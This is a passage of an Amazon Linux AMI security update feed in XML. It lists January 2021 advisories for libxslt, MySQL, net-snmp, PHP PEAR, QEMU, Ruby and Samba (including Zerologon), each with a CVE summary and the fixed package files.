release="2.2.13.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-debuginfo-1.6.0-2.2.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1463</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1463: medium priority package update for libxslt</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:16:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-18197:
In xsltCopyText in transform.c in libxslt 1.1.33, a pointer variable isn't reset under certain circumstances. If the relevant memory area happened to be freed and reused in a certain way, a bounds check could fail and memory outside a buffer could be written to, or uninitialized data could be disclosed.
1770768: CVE-2019-18197 libxslt: use after free in xsltCopyText in transform.c could lead to information disclosure
CVE-2019-11068:
libxslt through 1.1.33 allows bypass of a protection mechanism because callers of xsltCheckRead and xsltCheckWrite permit access even upon receiving a -1 error code. xsltCheckRead can return -1 for a crafted URL that is not actually invalid and is subsequently loaded.
1709697: CVE-2019-11068 libxslt: xsltCheckRead and xsltCheckWrite routines security bypass by crafted URL
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11068" title="" id="CVE-2019-11068" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18197" title="" id="CVE-2019-18197" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxslt" version="1.1.28" release="6.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-1.1.28-6.15.amzn1.x86_64.rpm</filename></package><package name="libxslt-debuginfo" version="1.1.28" release="6.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-debuginfo-1.1.28-6.15.amzn1.x86_64.rpm</filename></package><package name="libxslt-python26" version="1.1.28" release="6.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-python26-1.1.28-6.15.amzn1.x86_64.rpm</filename></package><package name="libxslt-python27" version="1.1.28" release="6.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-python27-1.1.28-6.15.amzn1.x86_64.rpm</filename></package><package name="libxslt-devel" version="1.1.28" release="6.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-devel-1.1.28-6.15.amzn1.x86_64.rpm</filename></package><package name="libxslt-debuginfo" version="1.1.28" release="6.15.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-debuginfo-1.1.28-6.15.amzn1.i686.rpm</filename></package><package name="libxslt" version="1.1.28" release="6.15.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-1.1.28-6.15.amzn1.i686.rpm</filename></package><package name="libxslt-python26" version="1.1.28" release="6.15.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-python26-1.1.28-6.15.amzn1.i686.rpm</filename></package><package name="libxslt-devel" version="1.1.28" release="6.15.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-devel-1.1.28-6.15.amzn1.i686.rpm</filename></package><package name="libxslt-python27" version="1.1.28" release="6.15.amzn1" epoch="0" 
arch="i686"><filename>Packages/libxslt-python27-1.1.28-6.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1464</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1464: medium priority package update for mysql56</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-14793:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1890750: CVE-2020-14793 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2020)
CVE-2020-14769:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1890739: CVE-2020-14769 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2020)
CVE-2020-14765:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: FTS). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1890738: CVE-2020-14765 mysql: Server: FTS unspecified vulnerability (CPU Oct 2020)
CVE-2020-14672:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Stored Procedure). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1890737: CVE-2020-14672 mysql: Server: Stored Procedure unspecified vulnerability (CPU Oct 2020)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14672" title="" id="CVE-2020-14672" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14765" title="" id="CVE-2020-14765" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14769" title="" id="CVE-2020-14769" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14793" title="" id="CVE-2020-14793" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-test" version="5.6.50" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.50-1.38.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.50" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.50-1.38.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.50" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.50-1.38.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.50" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.50-1.38.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.50" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.50-1.38.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.50" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.50-1.38.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.50" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.50-1.38.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.50" release="1.38.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql56-server-5.6.50-1.38.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.50" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.50-1.38.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.50" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.50-1.38.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.50" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.50-1.38.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.50" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.50-1.38.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.50" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.50-1.38.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.50" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.50-1.38.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.50" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.50-1.38.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.50" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.50-1.38.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.50" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.50-1.38.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.50" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.50-1.38.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.50" release="1.38.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql56-debuginfo-5.6.50-1.38.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.50" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.50-1.38.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.50" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.50-1.38.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.50" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.50-1.38.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1465</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1465: important priority package update for net-snmp</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-15862:
A flaw was found in Net-SNMP through version 5.73, where an Improper Privilege Management issue occurs: SNMP WRITE access to the EXTEND MIB allows running arbitrary commands as root. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
1873038: CVE-2020-15862 net-snmp: Improper Privilege Management in EXTEND MIB may lead to privileged commands execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15862" title="" id="CVE-2020-15862" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="net-snmp-debuginfo" version="5.5" release="60.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-debuginfo-5.5-60.22.amzn1.x86_64.rpm</filename></package><package name="net-snmp-python" version="5.5" release="60.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-python-5.5-60.22.amzn1.x86_64.rpm</filename></package><package name="net-snmp-perl" version="5.5" release="60.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-perl-5.5-60.22.amzn1.x86_64.rpm</filename></package><package name="net-snmp" version="5.5" release="60.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-5.5-60.22.amzn1.x86_64.rpm</filename></package><package name="net-snmp-devel" version="5.5" release="60.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-devel-5.5-60.22.amzn1.x86_64.rpm</filename></package><package name="net-snmp-libs" version="5.5" release="60.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-libs-5.5-60.22.amzn1.x86_64.rpm</filename></package><package name="net-snmp-utils" version="5.5" release="60.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-utils-5.5-60.22.amzn1.x86_64.rpm</filename></package><package name="net-snmp-debuginfo" version="5.5" release="60.22.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-debuginfo-5.5-60.22.amzn1.i686.rpm</filename></package><package name="net-snmp-python" version="5.5" release="60.22.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-python-5.5-60.22.amzn1.i686.rpm</filename></package><package name="net-snmp-libs" version="5.5" release="60.22.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-libs-5.5-60.22.amzn1.i686.rpm</filename></package><package name="net-snmp-perl" version="5.5" 
release="60.22.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-perl-5.5-60.22.amzn1.i686.rpm</filename></package><package name="net-snmp-devel" version="5.5" release="60.22.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-devel-5.5-60.22.amzn1.i686.rpm</filename></package><package name="net-snmp-utils" version="5.5" release="60.22.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-utils-5.5-60.22.amzn1.i686.rpm</filename></package><package name="net-snmp" version="5.5" release="60.22.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-5.5-60.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1466</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1466: medium priority package update for php7-pear</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-28949:
Archive_Tar through 1.4.10 has :// filename sanitization only to address phar attacks, and thus any other stream-wrapper attack (such as file:// to overwrite files) can still succeed.
1910323: CVE-2020-28949 Archive_Tar: improper filename sanitization leads to file overwrites
CVE-2020-28948:
Archive_Tar through 1.4.10 allows an unserialization attack because phar: is blocked but PHAR: is not blocked.
1904001: CVE-2020-28948 Archive_Tar: allows an unserialization attack because phar: is blocked but PHAR: is not blocked
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28948" title="" id="CVE-2020-28948" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28949" title="" id="CVE-2020-28949" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php7-pear" version="1.10.12" release="4.30.amzn1" epoch="1" arch="noarch"><filename>Packages/php7-pear-1.10.12-4.30.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1467</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1467: medium priority package update for qemu-kvm</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-15890:
A use-after-free issue was found in the SLiRP networking implementation of the QEMU emulator. The issue occurs in the ip_reass() routine while reassembling incoming packets, if the first fragment is bigger than the m->m_dat[] buffer. A user or process could use this flaw to crash the QEMU process on the host, resulting in a denial of service.
1749716: CVE-2019-15890 QEMU: Slirp: use-after-free during packet reassembly
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15890" title="" id="CVE-2019-15890" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="qemu-kvm" version="1.5.3" release="156.25.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-1.5.3-156.25.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-tools" version="1.5.3" release="156.25.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-tools-1.5.3-156.25.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-common" version="1.5.3" release="156.25.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-common-1.5.3-156.25.amzn1.x86_64.rpm</filename></package><package name="qemu-img" version="1.5.3" release="156.25.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-img-1.5.3-156.25.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-debuginfo" version="1.5.3" release="156.25.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-debuginfo-1.5.3-156.25.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1468</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1468: medium priority package update for ruby20</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-25613:
An issue was discovered in Ruby through 2.5.8, 2.6.x through 2.6.6, and 2.7.x through 2.7.1. WEBrick, a simple HTTP server bundled with Ruby, had not checked the transfer-encoding header value rigorously. An attacker may potentially exploit this issue to bypass a reverse proxy (which also has a poor header check), which may lead to an HTTP Request Smuggling attack.
1883623: CVE-2020-25613 ruby: potential HTTP request smuggling in WEBrick
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25613" title="" id="CVE-2020-25613" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby20" version="2.0.0.648" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.648-2.39.amzn1.x86_64.rpm</filename></package><package name="ruby20-irb" version="2.0.0.648" release="2.39.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.648-2.39.amzn1.noarch.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-2.39.amzn1.x86_64.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.648-2.39.amzn1.x86_64.rpm</filename></package><package name="rubygems20-devel" version="2.0.14.1" release="2.39.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-devel-2.0.14.1-2.39.amzn1.noarch.rpm</filename></package><package name="rubygems20" version="2.0.14.1" release="2.39.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14.1-2.39.amzn1.noarch.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.648-2.39.amzn1.x86_64.rpm</filename></package><package name="ruby20-doc" version="2.0.0.648" release="2.39.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-doc-2.0.0.648-2.39.amzn1.noarch.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.648-2.39.amzn1.x86_64.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="2.39.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-2.39.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-2.39.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-2.39.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-2.39.amzn1.i686.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-2.0.0.648-2.39.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.648-2.39.amzn1.i686.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-libs-2.0.0.648-2.39.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.648-2.39.amzn1.i686.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-2.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1469</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1469: critical priority package update for samba</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:21:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-1472:
A flaw was found in the Microsoft Windows Netlogon Remote Protocol (MS-NRPC), where it reuses a known, static, zero-value initialization vector (IV) in AES-CFB8 mode. This flaw allows an unauthenticated attacker to impersonate a domain-joined computer, including a domain controller, and possibly obtain domain administrator privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
1879822: CVE-2020-1472 samba: Netlogon elevation of privilege vulnerability (Zerologon)
CVE-2020-14323:
A null pointer dereference flaw was found in Samba's winbind service. This flaw allows a local user to crash the winbind service, causing a denial of service. The highest threat from this vulnerability is to system availability.
1891685: CVE-2020-14323 samba: Unprivileged user can crash winbind
CVE-2020-14318:
A flaw was found in the way samba handled file and directory permissions. An authenticated user could use this flaw to gain access to certain file and directory information which otherwise would be unavailable to the attacker.
1892631: CVE-2020-14318 samba: Missing handle permissions check in SMB1/2/3 ChangeNotify
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14318" title="" id="CVE-2020-14318" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14323" title="" id="CVE-2020-14323" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1472" title="" id="CVE-2020-1472" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="samba-winbind-modules" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.10.16" release="9.56.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.10.16-9.56.amzn1.noarch.rpm</filename></package><package name="samba" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.10.16" release="9.56.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/samba-test-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-krb5-printing" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.10.16" release="9.56.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/libsmbclient-devel-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-python-test" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-test-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.10.16" release="9.56.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.10.16-9.56.amzn1.noarch.rpm</filename></package><package name="samba-client" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="9.56.amzn1" epoch="0" 
arch="i686"><filename>Packages/samba-client-libs-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-python-test" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-test-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-krb5-printing-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.10.16-9.56.amzn1.i686.rpm</filename></package><package 